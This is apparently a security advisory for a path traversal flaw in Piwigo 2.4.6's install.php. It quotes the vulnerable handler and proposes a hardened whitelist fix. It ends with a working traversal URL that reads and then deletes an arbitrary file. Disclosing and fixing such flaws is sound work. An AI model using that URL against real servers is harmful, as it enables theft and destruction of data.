Piwigo is a photo gallery script written in PHP.

Piwigo 2.4.6 and other versions do not properly validate the value of the 'dl' parameter of the install.php script. The value is concatenated into a filesystem path with no traversal check, so an attacker can read arbitrary files on the affected machine and, because the same handler calls unlink() on the path after serving it, delete any file the web server process is allowed to remove. A single request does both.
====================================================================
/install.php (lines 113-124):
-----------------------------

if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
{
  // $_GET['dl'] is appended to the path unmodified: no basename(), no check
  // for '..', so it can point anywhere the web server account can read.
  $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
  header('Cache-Control: no-cache, must-revalidate');
  header('Pragma: no-cache');
  header('Content-Disposition: attachment; filename="database.inc.php"');
  header('Content-Transfer-Encoding: binary');
  header('Content-Length: '.filesize($filename));
  echo file_get_contents($filename);   // arbitrary file read
  unlink($filename);                   // followed by arbitrary file delete
  exit();
}
====================================================================
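The root cause is that the client-supplied value is used as a path component. A hardened version of the handler, written here as an added example (it is not Piwigo's code and not the vendor's patch linked below), treats the 'dl' value as a lookup key into a fixed whitelist and then confirms with realpath() that the resolved file still lives inside the data directory. It assumes PHPWG_ROOT_PATH and $conf['data_location'] are defined as install.php defines them, and that the only legitimate download is the generated pwg_database.inc.php, an assumption drawn from the 'pwg_' prefix and the fixed "database.inc.php" attachment name in the listing above. http_response_code() needs PHP 5.4 or later, which matches the tested stack.

```php
<?php
// Added example, not Piwigo's code: a hardened replacement for the
// install.php download handler quoted in this advisory.
// Assumes PHPWG_ROOT_PATH and $conf['data_location'] are defined as in
// install.php, and that pwg_database.inc.php is the only file ever offered.

// The request value is a lookup key, never part of a path, so '../' and
// absolute paths are rejected without ever touching the filesystem.
$allowed_downloads = array(
    'database.inc.php' => 'pwg_database.inc.php',
);

if (!empty($_GET['dl']))
{
    $token = (string) $_GET['dl'];
    if (!isset($allowed_downloads[$token]))
    {
        http_response_code(400);
        exit('Invalid download request.');
    }

    $data_dir = realpath(PHPWG_ROOT_PATH . $conf['data_location']);
    $filename = ($data_dir === false)
        ? false
        : realpath($data_dir . DIRECTORY_SEPARATOR . $allowed_downloads[$token]);

    // Defense in depth: realpath() resolves '..' and symlinks, so even a
    // mistaken whitelist entry cannot escape the data directory. is_file()
    // also excludes directories, which file_exists() would have accepted.
    if ($data_dir === false || $filename === false
        || strpos($filename, $data_dir . DIRECTORY_SEPARATOR) !== 0
        || !is_file($filename))
    {
        http_response_code(404);
        exit('File not found.');
    }

    header('Cache-Control: no-cache, must-revalidate');
    header('Pragma: no-cache');
    header('Content-Disposition: attachment; filename="database.inc.php"');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . filesize($filename));
    readfile($filename);

    // Deleting after download keeps the original behaviour, but with the
    // whitelist above it can only ever remove the generated config file.
    unlink($filename);
    exit();
}
```

The whitelist is the actual fix; the realpath() prefix check is there so that a future edit which reintroduces user input into the file name still cannot leave the data directory.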

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843

15.02.2013

--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt

Note that a successful request also deletes the file it returns (unlink() runs after the contents are sent), so test against a copy rather than a file you need.